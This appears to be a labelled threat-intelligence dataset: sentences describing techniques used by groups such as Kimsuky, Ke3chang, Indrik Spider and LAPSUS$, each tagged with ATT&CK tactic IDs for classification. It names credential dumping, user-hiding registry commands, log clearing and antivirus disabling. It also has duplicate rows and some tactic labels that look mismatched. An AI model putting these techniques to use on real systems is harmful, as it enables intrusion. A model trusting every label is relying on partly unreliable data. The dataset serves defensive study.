HEXANE has run `net localgroup` to enumerate local groups.,['TA0007:Discovery']
HEXANE has relied on victim's executing malicious file attachments delivered via email or embedded within actor-controlled websites to deliver malware.,['TA0002:Execution']
HEXANE has used password spraying attacks to obtain valid credentials.,['TA0006:Credential Access']
HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.,['TA0002:Execution']
HEXANE has enumerated processes on targeted systems.,['TA0007:Discovery']
HEXANE has used remote desktop sessions for lateral movement.,['TA0008:Lateral Movement']
HEXANE has used `net view` to enumerate domain machines.,['TA0007:Discovery']
HEXANE has used a scheduled task to establish persistence for a keylogger.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HEXANE has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers.,['TA0042:Resource Development']
HEXANE has enumerated programs installed on an infected machine.,['TA0007:Discovery']
HEXANE has collected the hostname of a compromised machine.,['TA0007:Discovery']
HEXANE has used Ping and `tracert` for network discovery.,['TA0007:Discovery']
HEXANE has used netstat to monitor connections to specific ports.,['TA0007:Discovery']
HEXANE has run `whoami` on compromised machines to identify the current user.,['TA0007:Discovery']
"HEXANE has acquired, and sometimes customized, open source tools such as Mimikatz, Empire, VNC remote access software, and DIG.net.",['TA0042:Resource Development']
HEXANE has staged malware on fraudulent websites set up to impersonate targeted organizations.,['TA0042:Resource Development']
HEXANE has used a VisualBasic script named `MicrosoftUpdator.vbs` for execution of a PowerShell keylogger.,['TA0002:Execution']
HEXANE has used WMI event subscriptions for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Higaisa performed padding with null bytes before calculating its hash.,['TA0005:Defense Evasion']
Higaisa’s JavaScript file used a legitimate Microsoft Office 2007 package to side-load the OINFO12.OCX dynamic link library.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Higaisa used certutil to decode Base64 binaries at runtime and a 16-byte XOR key to decrypt data.,['TA0005:Defense Evasion']
Higaisa used Base64 encoded compressed payloads.,['TA0005:Defense Evasion']
Higaisa exfiltrated data over its C2 channel.,['TA0010:Exfiltration']
Higaisa has exploited CVE-2018-0798 for execution.,['TA0002:Execution']
Higaisa used a payload that creates a hidden window.,['TA0005:Defense Evasion']
Higaisa discovered system proxy settings and used them if available.,['TA0011:Command and Control']
Higaisa used JavaScript to execute additional files.,['TA0002:Execution']
Higaisa used malicious e-mail attachments to lure victims into executing LNK files.,['TA0002:Execution']
Higaisa named a shellcode loader binary svchast.exe to spoof the legitimate svchost.exe.,['TA0005:Defense Evasion']
Higaisa has called various native OS APIs.,['TA0002:Execution']
Higaisa’s shellcode attempted to find the process ID of the current process.,['TA0007:Discovery']
Higaisa used a FakeTLS session for C2 communications.,['TA0011:Command and Control']
Higaisa added a spoofed binary to the start-up folder for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Higaisa dropped and added officeupdate.exe to scheduled tasks.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Higaisa sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes.,['TA0010:Exfiltration']
Higaisa has sent spearphishing emails containing malicious attachments.,['TA0001:Initial Access']
Higaisa used AES-128 to encrypt C2 traffic.,['TA0011:Command and Control']
"Higaisa collected the system volume serial number, GUID, and computer name.",['TA0007:Discovery']
Higaisa used ipconfig to gather network configuration information.,['TA0007:Discovery']
Higaisa used a function to gather the current time.,['TA0007:Discovery']
Higaisa has used VBScript code on the victim's machine.,['TA0002:Execution']
Higaisa used HTTP and HTTPS to send data back to its C2 server.,['TA0011:Command and Control']
Higaisa used cmd.exe for execution.,['TA0002:Execution']
Higaisa used an XSL file to run VBScript code.,['TA0005:Defense Evasion']
INC Ransom has used valid accounts over RDP to connect to targeted systems.,['TA0011:Command and Control']
INC Ransom has used 7-Zip and WinRAR to archive collected data prior to exfiltration.,['TA0009:Collection']
INC Ransom has used INC Ransomware to encrypt victim's data.,['TA0040:Impact']
INC Ransom has staged data on compromised hosts prior to exfiltration.,['TA0009:Collection']
"INC Ransom can use SystemSettingsAdminFlows.exe, a native Windows utility, to disable Windows Defender.",['TA0005:Defense Evasion']
INC Ransom has scanned for domain admin accounts in compromised environments.,['TA0007:Discovery']
INC Ransom has enumerated domain groups on targeted hosts.,['TA0007:Discovery']
INC Ransom has exploited known vulnerabilities including CVE-2023-3519 in Citrix NetScaler for initial access.,['TA0001:Initial Access']
INC Ransom has uninstalled tools from compromised endpoints after use.,['TA0005:Defense Evasion']
INC Ransom has stolen and encrypted victim's data in order to extort payment for keeping it private or decrypting it.,['TA0040:Impact']
INC Ransom has downloaded tools to compromised servers including Advanced IP Scanner.,['TA0011:Command and Control']
INC Ransom has used a rapid succession of copy commands to install a file encryption executable across multiple endpoints within compromised infrastructure.,['TA0008:Lateral Movement']
INC Ransom has named a PsExec executable winupd to mimic a legitimate Windows update file.,['TA0005:Defense Evasion']
INC Ransom has used NETSCAN.EXE for internal reconnaissance.,['TA0007:Discovery']
INC Ransom has used Internet Explorer to view folders on other systems.,['TA0007:Discovery']
INC Ransom has used phishing to gain initial access.,['TA0001:Initial Access']
INC Ransom has used AnyDesk and PuTTY on compromised systems.,['TA0011:Command and Control']
INC Ransom has used RDP to move laterally.,['TA0008:Lateral Movement']
"INC Ransom has run a file encryption executable via `Service Control Manager/7045;winupd,%SystemRoot%\winupd.exe,user mode service,demand start,LocalSystem`.",['TA0002:Execution']
INC Ransom has used RDP to test network connections.,['TA0007:Discovery']
"INC Ransom has acquired and used several tools including MegaSync, AnyDesk, esentutl and PsExec.",['TA0042:Resource Development']
INC Ransom has used Megasync to exfiltrate data to the cloud.,['TA0010:Exfiltration']
INC Ransom has used compromised valid accounts for access to victim environments.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
INC Ransom has used `cmd.exe` to launch malicious payloads.,['TA0002:Execution']
INC Ransom has used WMIC to deploy ransomware.,['TA0002:Execution']
"Inception used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.",['TA0006:Credential Access']
"Inception used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host.",['TA0009:Collection']
Inception has used specific malware modules to gather domain membership.,['TA0007:Discovery']
Inception has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.,['TA0005:Defense Evasion']
"Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.",['TA0002:Execution']
Inception used a file listing plugin to collect information about file and directories both on local and remote drives.,['TA0007:Discovery']
Inception lured victims into clicking malicious files for machine reconnaissance and to execute malware.,['TA0002:Execution']
Inception has used malicious HTA files to drop and execute malware.,['TA0005:Defense Evasion']
Inception used chains of compromised routers to proxy C2 communications between them and cloud service providers.,['TA0011:Command and Control']
Inception has used PowerShell to execute malicious commands and payloads.,['TA0002:Execution']
Inception has used a reconnaissance module to identify active processes and other associated loaded modules.,['TA0007:Discovery']
Inception has maintained persistence by modifying Registry run key value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Inception has ensured persistence at system boot by setting the value regsvr32 %path%\ctfmonrn.dll /s.,['TA0005:Defense Evasion']
Inception has enumerated installed software on compromised systems.,['TA0007:Discovery']
Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise.,['TA0001:Initial Access']
Inception has encrypted network communications with AES.,['TA0011:Command and Control']
Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host.,['TA0007:Discovery']
Inception has used decoy documents to load malicious remote payloads via HTTP.,['TA0005:Defense Evasion']
Inception has obtained and used open-source tools such as LaZagne.,['TA0042:Resource Development']
Inception has used VBScript to execute malicious commands and payloads.,['TA0002:Execution']
"Inception has used HTTP, HTTPS, and WebDav in network communications.",['TA0011:Command and Control']
Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.,['TA0011:Command and Control']
"IndigoZebra has established domains, some of which were designed to look like official government domains, for their operations.",['TA0042:Resource Development']
IndigoZebra has compromised legitimate email accounts to use in their spearphishing operations.,['TA0042:Resource Development']
IndigoZebra has downloaded additional files and tools from its C2 server.,['TA0011:Command and Control']
IndigoZebra sent spearphishing emails containing malicious attachments that urged recipients to review modifications in the file which would trigger the attack.,['TA0002:Execution']
IndigoZebra sent spearphishing emails containing malicious password-protected RAR attachments.,['TA0001:Initial Access']
IndigoZebra has acquired open source tools such as NBTscan and Meterpreter for their operations.,['TA0042:Resource Development']
IndigoZebra created Dropbox accounts for their operations.,['TA0042:Resource Development']
Indrik Spider has purchased access to victim VPNs to facilitate access to victim environments.,['TA0042:Resource Development']
"Indrik Spider has used Cobalt Strike to empty log files. Additionally, Indrik Spider has cleared all event logs using `wevutil`.",['TA0005:Defense Evasion']
Indrik Spider used wmic.exe to add a new user to the system.,['TA0003:Persistence']
Indrik Spider has searched files to obtain and exfiltrate credentials.,['TA0006:Credential Access']
"Indrik Spider has encrypted domain-controlled systems using BitPaymer. Additionally, Indrik Spider used PsExec to execute a ransomware script.",['TA0040:Impact']
"Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring. Indrik Spider has used `MpCmdRun` to revert the definitions in Microsoft Defender. Additionally, Indrik Spider has used WMI to stop or uninstall and reset anti-virus products and other defensive services.",['TA0005:Defense Evasion']
"Indrik Spider has collected credentials from infected systems, including domain accounts.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Indrik Spider has created email accounts to communicate with their ransomware victims, to include providing payment and decryption details.",['TA0042:Resource Development']
Indrik Spider has exfiltrated data using Rclone or MEGASync prior to deploying ransomware.,['TA0010:Exfiltration']
"Indrik Spider has downloaded tools, such as the Advanced Port Scanner utility and Lansweeper, to conduct internal reconnaissance of the victim network. Indrik Spider has also accessed the victim’s VMware VCenter, which had information about host configuration, clusters, etc.",['TA0043:Reconnaissance']
Indrik Spider has used Group Policy Objects to deploy batch scripts.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.",['TA0011:Command and Control']
Indrik Spider has used malicious JavaScript files for several components of their attack.,['TA0002:Execution']
Indrik Spider has conducted Kerberoasting attacks using a module from GitHub.,['TA0006:Credential Access']
Indrik Spider used Cobalt Strike to carry out credential dumping using ProcDump.,['TA0006:Credential Access']
Indrik Spider has created local system accounts and has added the accounts to privileged groups.,['TA0003:Persistence']
Indrik Spider has stored collected data in a .tmp file.,['TA0009:Collection']
Indrik Spider has attempted to get users to click on a malicious zipped file.,['TA0002:Execution']
"Indrik Spider has developed malware for their operations, including ransomware such as BitPaymer and WastedLocker.",['TA0042:Resource Development']
Indrik Spider used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors.,['TA0005:Defense Evasion']
Indrik Spider has modified registry keys to prepare for ransomware execution and to disable common administrative utilities.,['TA0005:Defense Evasion']
Indrik Spider has accessed and exported passwords from password managers.,['TA0006:Credential Access']
Indrik Spider has used PowerShell Empire for execution of malware.,['TA0002:Execution']
Indrik Spider has used a service account to extract copies of the `Security` Registry hive.,['TA0007:Discovery']
Indrik Spider has used RDP for lateral movement.,['TA0008:Lateral Movement']
"Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.",['TA0007:Discovery']
Indrik Spider has used SSH for lateral movement.,['TA0008:Lateral Movement']
Indrik Spider has served fake updates via legitimate websites that have been compromised.,['TA0042:Resource Development']
Indrik Spider has used PsExec to stop services prior to the execution of ransomware.,['TA0040:Impact']
Indrik Spider has used the win32_service WMI class to retrieve a list of services from the system.,['TA0007:Discovery']
Indrik Spider has used valid accounts for initial access and lateral movement. Indrik Spider has also maintained access to the victim environment through the VPN infrastructure.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Indrik Spider has used batch scripts on victim's machines.,['TA0002:Execution']
Indrik Spider has used WMIC to execute commands on remote computers.,['TA0002:Execution']
The Ke3chang group has been known to compress data before exfiltration.,['TA0009:Collection']
Ke3chang is known to use 7Zip and RAR with passwords to encrypt data prior to exfiltration.,['TA0009:Collection']
Ke3chang has performed frequent and scheduled data collection from victim networks.,['TA0009:Collection']
Ke3chang has performed frequent and scheduled data exfiltration from compromised networks.,['TA0010:Exfiltration']
Ke3chang has used compromised credentials to sign into victims’ Microsoft 365 accounts.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Malware used by Ke3chang can run commands on the command-line interface.,['TA0002:Execution']
Ke3chang malware RoyalDNS has used DNS for C2.,['TA0011:Command and Control']
Ke3chang gathered information and files from local directories for exfiltration.,['TA0009:Collection']
Ke3chang has deobfuscated Base64-encoded shellcode strings prior to loading them.,['TA0005:Defense Evasion']
"Ke3chang performs account discovery using commands such as net localgroup administrators and net group ""REDACTED"" /domain on specific permissions groups.",['TA0007:Discovery']
Ke3chang performs discovery of permission groups net group /domain.,['TA0007:Discovery']
Ke3chang transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.,['TA0010:Exfiltration']
"Ke3chang has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers.",['TA0001:Initial Access']
Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Ke3chang uses command-line interaction to search files and directories.,['TA0007:Discovery']
Ke3chang has used Mimikatz to generate Kerberos golden tickets.,['TA0006:Credential Access']
Ke3chang has used tools to download files to compromised machines.,['TA0011:Command and Control']
Ke3chang has used keyloggers.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Ke3chang has dumped credentials, including by using gsecdump.",['TA0006:Credential Access']
"Ke3chang has dumped credentials, including by using Mimikatz.",['TA0006:Credential Access']
"Ke3chang performs account discovery using commands such as net localgroup administrators and net group ""REDACTED"" /domain on specific permissions groups.",['TA0007:Discovery']
Ke3chang has developed custom malware that allowed them to maintain persistence on victim networks.,['TA0042:Resource Development']
"Ke3chang has dropped their malware into legitimate installed software paths including: `C:\ProgramFiles\Realtek\Audio\HDA\AERTSr.exe`, `C:\Program Files \Foxit Software\Foxit Reader\FoxitRdr64.exe`, `C:\Program Files \Adobe\Flash Player\AddIns\airappinstaller\airappinstall.exe`, and `C:\Program Files \Adobe\Acrobat Reader DC\Reader\AcroRd64.exe`.",['TA0005:Defense Evasion']
Ke3chang has used NTDSDump and other password dumping tools to gather credentials.,['TA0006:Credential Access']
Ke3chang has used Base64-encoded shellcode strings.,['TA0005:Defense Evasion']
Ke3chang performs process discovery using tasklist commands.,['TA0007:Discovery']
Several Ke3chang backdoors achieved persistence by adding a Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ke3chang has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes.,['TA0009:Collection']
"Ke3chang has used network scanning and enumeration tools, including Ping.",['TA0007:Discovery']
Ke3chang has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files.,['TA0005:Defense Evasion']
Ke3chang actors have been known to copy files to the network shares of other computers to move laterally.,['TA0008:Lateral Movement']
"Ke3chang has dumped credentials, including by using gsecdump.",['TA0006:Credential Access']
Ke3chang has used a tool known as RemoteExec ) to remotely execute batch scripts and binaries.,['TA0002:Execution']
Ke3chang used a SharePoint enumeration and data dumping tool known as spwebmember.,['TA0009:Collection']
Ke3chang performs operating system information discovery using systeminfo and has used implants to identify the system language and computer name.,['TA0007:Discovery']
Ke3chang has used implants to collect the system language ID of a compromised machine.,['TA0007:Discovery']
Ke3chang has performed local network configuration discovery using ipconfig.,['TA0007:Discovery']
Ke3chang performs local network connection discovery using netstat.,['TA0007:Discovery']
Ke3chang has used implants capable of collecting the signed-in username.,['TA0007:Discovery']
Ke3chang performs service discovery using net start commands.,['TA0007:Discovery']
Ke3chang has obtained and used tools such as Mimikatz.,['TA0042:Resource Development']
"Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer by using the COM interface IWebBrowser2.,['TA0011:Command and Control']
Ke3chang has used batch scripts in its malware to install persistence mechanisms.,['TA0002:Execution']
Ke3chang backdoor RoyalDNS established persistence through adding a service called Nwsapagent.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kimsuky has used funds from stolen and laundered cryptocurrency to acquire operational infrastructure.,['TA0042:Resource Development']
Kimsuky has added accounts to specific groups with net localgroup.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kimsuky has used modified versions of PHProxy to examine web traffic between the victim and the accessed website.,"['TA0009:Collection', 'TA0006:Credential Access']"
Kimsuky has used RC4 encryption before exfil.,['TA0009:Collection']
Kimsuky has used QuickZip to archive stolen files before exfiltration.,['TA0009:Collection']
Kimsuky has used Blogspot pages for C2.,['TA0011:Command and Control']
Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.,['TA0003:Persistence']
Kimsuky has a HWP document stealer module which changes the default program association in the registry to open HWP documents.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Kimsuky has signed files with the name EGIS CO,. Ltd..",['TA0005:Defense Evasion']
Kimsuky has used tools that are capable of obtaining credentials from saved mail.,['TA0006:Credential Access']
Kimsuky has used browser extensions including Google Chrome to steal passwords and cookies from browsers. Kimsuky has also used Nirsoft's WebBrowserPassView tool to dump the passwords obtained from victims.,['TA0006:Credential Access']
"Kimsuky has collected Office, PDF, and HWP documents from its victims.",['TA0009:Collection']
Kimsuky has decoded malicious VBScripts using Base64.,['TA0005:Defense Evasion']
Kimsuky created and used a mailing toolkit to use in spearphishing attacks.,['TA0042:Resource Development']
Kimsuky has been observed disabling the system firewall.,['TA0005:Defense Evasion']
Kimsuky has been observed turning off Windows Security Center and can hide the AV software window from the view of the infected user.,['TA0005:Defense Evasion']
"Kimsuky has registered domains to spoof targeted organizations and trusted third parties including search engines, web platforms, and cryptocurrency exchanges.",['TA0042:Resource Development']
Kimsuky has compromised legitimate sites and used them to distribute malware.,['TA0042:Resource Development']
Kimsuky has compromised email accounts to send spearphishing e-mails.,['TA0042:Resource Development']
Kimsuky has created email accounts for phishing operations.,['TA0042:Resource Development']
Kimsuky has collected valid email addresses including personal accounts that were subsequently used for spearphishing and other forms of social engineering.,['TA0043:Reconnaissance']
Kimsuky has set auto-forward rules on victim's e-mail accounts.,['TA0009:Collection']
Kimsuky has collected victim employee name information.,['TA0043:Reconnaissance']
Kimsuky has exfiltrated data over its C2 channel.,['TA0010:Exfiltration']
Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts.,['TA0010:Exfiltration']
"Kimsuky has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688.",['TA0001:Initial Access']
Kimsuky has obtained exploit code for various CVEs.,['TA0042:Resource Development']
Kimsuky has used RDP to establish persistence.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Kimsuky has deleted the exfiltrated data on disk after transmission. Kimsuky has also used an instrumentor script to terminate browser processes running on an infected system and then delete the cookie files on disk.,['TA0005:Defense Evasion']
Kimsuky has used FTP to download additional malware to the target machine.,['TA0011:Command and Control']
Kimsuky has the ability to enumerate all files and directories on an infected system.,['TA0007:Discovery']
Kimsuky has stolen and laundered cryptocurrency to self-fund operations including the acquisition of infrastructure.,['TA0040:Impact']
"Kimsuky has collected victim organization information including but not limited to organization hierarchy, functions, press releases, and others.",['TA0043:Reconnaissance']
Kimsuky has run reg add ‘HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList’ /v to hide a newly created user.,['TA0005:Defense Evasion']
Kimsuky has used an information gathering module that will hide an AV software window from the victim.,['TA0005:Defense Evasion']
"Kimsuky has downloaded additional scripts, tools, and malware onto victim systems.",['TA0011:Command and Control']
Kimsuky has sent internal spearphishing emails for lateral movement after stealing victim information.,['TA0008:Lateral Movement']
Kimsuky has used JScript for logging and downloading additional tools.,['TA0002:Execution']
Kimsuky has used a PowerShell-based keylogger as well as a tool called MECHANICAL to log keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
Kimsuky has gathered credentials using Mimikatz and ProcDump.,['TA0006:Credential Access']
Kimsuky has created accounts with net user.,['TA0003:Persistence']
Kimsuky has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kimsuky has staged collected data files under C:\Program Files\Common Files\System\Ole DB\.,['TA0009:Collection']
Kimsuky has used e-mail to send exfiltrated data to C2 servers.,['TA0011:Command and Control']
Kimsuky has used attempted to lure victims into opening malicious e-mail attachments.,['TA0002:Execution']
Kimsuky has lured victims into clicking malicious links.,['TA0002:Execution']
Kimsuky has developed its own unique malware such as MailFetch.py for use in operations.,['TA0042:Resource Development']
Kimsuky has disguised services to appear as benign software or related to operating system functions.,['TA0005:Defense Evasion']
Kimsuky has renamed malware to legitimate names such as ESTCommon.dll or patch.dll.,['TA0005:Defense Evasion']
Kimsuky has modified Registry settings for default file associations to enable all macros and for persistence.,['TA0005:Defense Evasion']
Kimsuky has used mshta.exe to run malicious scripts on the system.,['TA0005:Defense Evasion']
Kimsuky has used a proprietary tool to intercept one time passwords required for two-factor authentication.,['TA0006:Credential Access']
Kimsuky has used the Nirsoft SniffPass network sniffer to obtain passwords sent over non-secure protocols.,"['TA0006:Credential Access', 'TA0007:Discovery']"
Kimsuky has obfuscated binary strings including the use of XOR encryption and Base64 encoding. Kimsuky has also modified the first byte of DLL implants targeting victims to prevent recognition of the executable file format.,['TA0005:Defense Evasion']
Kimsuky has used pass the hash for authentication to remote access software used in C2.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Kimsuky has used tailored spearphishing emails to gather victim information including contat lists to identify additional targets.,['TA0043:Reconnaissance']
Kimsuky has executed a variety of PowerShell scripts including Invoke-Mimikatz.,['TA0002:Execution']
Kimsuky can gather a list of all processes running on a victim's machine.,['TA0007:Discovery']
Kimsuky has used a file injector DLL to spawn a benign process on the victim's system and inject the malicious payload into it via process hollowing.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Kimsuky has used Win7Elevate to inject malicious code into explorer.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Kimsuky has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collect email data.,['TA0002:Execution']
Kimsuky has obtained specific Registry keys and values on a compromised host.,['TA0007:Discovery']
Kimsuky has used the Invoke-Mimikatz PowerShell script to reflectively load a Mimikatz credential stealing DLL into memory.,['TA0005:Defense Evasion']
Kimsuky has placed scripts in the startup folder for persistence and modified the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce` Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kimsuky has executed malware with regsvr32s.,['TA0005:Defense Evasion']
Kimsuky has used a modified TeamViewer client as a command and control channel.,['TA0011:Command and Control']
Kimsuky has used RDP for direct remote point-and-click access.,['TA0008:Lateral Movement']
Kimsuky has used tools such as the MailFetch mail crawler to collect victim emails from online services via IMAP.,['TA0009:Collection']
Kimsuky has used `rundll32.exe` to execute malicious scripts and malware on a victim's network.,['TA0005:Defense Evasion']
Kimsuky has downloaded additional malware with scheduled tasks.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google to target victims.",['TA0043:Reconnaissance']
Kimsuky has searched for information on the target company's website.,['TA0043:Reconnaissance']
Kimsuky has checked for the presence of antivirus software with powershell Get-CimInstance -Namespace root/securityCenter2 – classname antivirusproduct.,['TA0007:Discovery']
Kimsuky has purchased hosting servers with virtual currency and prepaid cards.,['TA0042:Resource Development']
Kimsuky has used Twitter to monitor potential victims and to prepare targeted phishing e-mails.,['TA0043:Reconnaissance']
Kimsuky has created social media accounts to monitor news and security trends as well as potential targets.,['TA0042:Resource Development']
Kimsuky has packed malware with UPX.,['TA0005:Defense Evasion']
"Kimsuky has used emails containing Word, Excel and/or HWP documents in their spearphishing campaigns.",['TA0001:Initial Access']
Kimsuky has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain.,['TA0001:Initial Access']
Kimsuky has used links in e-mail to steal account information including web beacons for target profiling.,['TA0043:Reconnaissance']
"Kimsuky has enumerated drives, OS type, OS version, and other information using a script or the ""systeminfo"" command.",['TA0007:Discovery']
Kimsuky has used `ipconfig/all` and web beacons sent via email to gather network configuration information.,['TA0007:Discovery']
Kimsuky has used an instrumentor script to gather the names of all services running on a victim's system.,['TA0007:Discovery']
Kimsuky has manipulated timestamps for creation or compilation dates to defeat anti-forensics.,['TA0005:Defense Evasion']
"Kimsuky has obtained and used tools such as Nirsoft WebBrowserPassVIew, Mimikatz, and PsExec.",['TA0042:Resource Development']
"Kimsuky has used compromised and acquired infrastructure to host and deliver malware including Blogspot to host beacons, file exfiltrators, and implants.",['TA0042:Resource Development']
Kimsuky has used Visual Basic to download malicious payloads. Kimsuky has also used malicious VBA macros within maldocs disguised as forms that trigger when a victim types any content into the lure.,['TA0002:Execution']
Kimsuky has used HTTP GET and POST requests for C2.,['TA0011:Command and Control']
Kimsuky has hosted content used for targeting efforts via web services such as Blogspot.,['TA0042:Resource Development']
"Kimsuky has used modified versions of open source PHP web shells to maintain access, often adding ""Dinosaur"" references within the code.",['TA0003:Persistence']
Kimsuky has executed Windows commands by using `cmd` and running batch scripts.,['TA0002:Execution']
Kimsuky has created new services for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LAPSUS$ has removed a targeted organization's global admin accounts to lock the organization out of all access.,['TA0040:Impact']
LAPSUS$ has added the global admin role to accounts they have created in the targeted organization's cloud instances.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LAPSUS$ has gathered detailed knowledge of an organization's supply chain relationships.,['TA0043:Reconnaissance']
"LAPSUS$ has targeted various collaboration tools like Slack, Teams, JIRA, Confluence, and others to hunt for exposed credentials to support privilege escalation and lateral movement.",['TA0006:Credential Access']
LAPSUS$ has created global admin accounts in the targeted organization's cloud instances to gain persistence.,['TA0003:Persistence']
LAPSUS$ has used compromised credentials to access cloud assets within a target organization.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
LAPSUS$ has searched public code repositories for exposed credentials.,['TA0043:Reconnaissance']
LAPSUS$ has searched a victim's network for code repositories like GitLab and GitHub to discover further high-privilege account credentials.,['TA0009:Collection']
LAPSUS$ has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials.,['TA0009:Collection']
LAPSUS$ has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets.,['TA0005:Defense Evasion']
LAPSUS$ has gathered user identities and credentials to gain initial access to a victim's organization; the group has also called an organization's help desk to reset a target's credentials.,['TA0043:Reconnaissance']
LAPSUS$ has obtained passwords and session tokens with the use of the Redline password stealer.,['TA0006:Credential Access']
LAPSUS$ has used DCSync attacks to gather credentials for privilege escalation routines.,['TA0006:Credential Access']
LAPSUS$ has reconfigured a victim's DNS records to actor-controlled domains and websites.,['TA0042:Resource Development']
LAPSUS$ has deleted the target's systems and resources both on-premises and in the cloud.,['TA0040:Impact']
"LAPSUS$ uploaded sensitive files, information, and credentials from a targeted organization for extortion or public release.",['TA0009:Collection']
LAPSUS$ has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process.,['TA0005:Defense Evasion']
LAPSUS$ has used the AD Explorer tool to enumerate users on a victim's network.,['TA0007:Discovery']
LAPSUS$ has used the AD Explorer tool to enumerate groups on a victim's network.,['TA0007:Discovery']
"LAPSUS$ has payed employees, suppliers, and business partners of target organizations for credentials.",['TA0042:Resource Development']
"LAPSUS$ has gathered employee email addresses, including personal accounts, for social engineering and initial access efforts.",['TA0043:Reconnaissance']
LAPSUS$ has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account.,['TA0009:Collection']
"LAPSUS$ has exploited unpatched vulnerabilities on internally accessible servers including JIRA, GitLab, and Confluence for privilege escalation.",['TA0004:Privilege Escalation']
"LAPSUS$ has gained access to internet-facing systems and applications, including virtual private network , remote desktop protocol , and virtual desktop infrastructure including Citrix.","['TA0001:Initial Access', 'TA0003:Persistence']"
LAPSUS$ has gathered detailed information of target employees to enhance their social engineering lures.,['TA0043:Reconnaissance']
LAPSUS$ has gathered detailed knowledge of team structures within a target organization.,['TA0043:Reconnaissance']
LAPSUS$ has called victims' help desk and impersonated legitimate users with previously gathered information in order to gain access to privileged accounts.,['TA0005:Defense Evasion']
LAPSUS$ acquired and used the Redline password stealer in their operations.,['TA0042:Resource Development']
LAPSUS$ has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials.,['TA0009:Collection']
LAPSUS$ has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval.,['TA0006:Credential Access']
LAPSUS$ has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval.,['TA0006:Credential Access']
LAPSUS$ has used Windows built-in tool `ntdsutil` to extract the Active Directory database.,['TA0006:Credential Access']
LAPSUS$ has accessed local password managers and databases to obtain further credentials from a compromised network.,['TA0006:Credential Access']
